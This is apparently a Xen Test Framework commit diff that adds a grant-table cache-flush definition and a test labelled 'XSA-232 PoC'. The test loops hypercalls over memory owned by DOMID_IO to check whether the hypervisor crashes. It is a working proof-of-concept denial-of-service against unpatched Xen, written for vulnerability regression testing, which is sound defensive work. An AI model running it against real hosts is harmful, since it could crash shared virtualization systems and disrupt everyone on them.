uint32_t version;
};
+/*
+ * Issue one or more cache maintenance operations on a portion of a
+ * page granted to the calling domain by a foreign domain.
+ */
+#define GNTTABOP_cache_flush 12
+struct gnttab_cache_flush {
+ union {
+ uint64_t dev_bus_addr;
+ grant_ref_t ref;
+ } a;
+ uint16_t offset; /* offset from start of grant */
+ uint16_t length; /* size within the grant */
+#define GNTTAB_CACHE_CLEAN (1<<0)
+#define GNTTAB_CACHE_INVAL (1<<1)
+#define GNTTAB_CACHE_SOURCE_GREF (1<<31)
+ uint32_t op;
+};
+
#endif /* XEN_PUBLIC_GRANT_TABLE_H */
/*
--- /dev/null
+/**
+ * @file tests/xsa-232/main.c
+ * @ref test-xsa-232
+ *
+ * @page test-xsa-232 XSA-232
+ *
+ * Advisory: [XSA-232](http://xenbits.xen.org/xsa/advisory-232.html)
+ *
+ * GNTTABOP_cache_flush takes a machine address, looks up the page owner and
+ * unconditionally follows the owners grant table pointer. For system domains
+ * such as DOMID_IO, there is no grant table set up.
+ *
+ * Loop over the first 1MB of memory (which is owned by DOMID_IO), poking the
+ * hypercall. If Xen remains alive, it is probably not vulnerable.
+ *
+ * @see tests/xsa-232/main.c
+ */
+#include <xtf.h>
+
+#include <arch/pagetable.h>
+#include <arch/symbolic-const.h>
+
+const char test_title[] = "XSA-232 PoC";
+
+void test_main(void)
+{
+ struct gnttab_cache_flush flush = {
+ .length = PAGE_SIZE,
+ .op = GNTTAB_CACHE_INVAL | GNTTAB_CACHE_CLEAN,
+ };
+
+ for ( ; flush.a.dev_bus_addr < MB(1); flush.a.dev_bus_addr += PAGE_SIZE )
+ hypercall_grant_table_op(GNTTABOP_cache_flush, &flush, 1);
+
+ /* If Xen is alive at this point, it is probably not vulnerable. */
+
+ xtf_success("Success: Probably not vulnerable to XSA-232\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */
projects / people / andrewcoop / xen-test-framework.git / commitdiff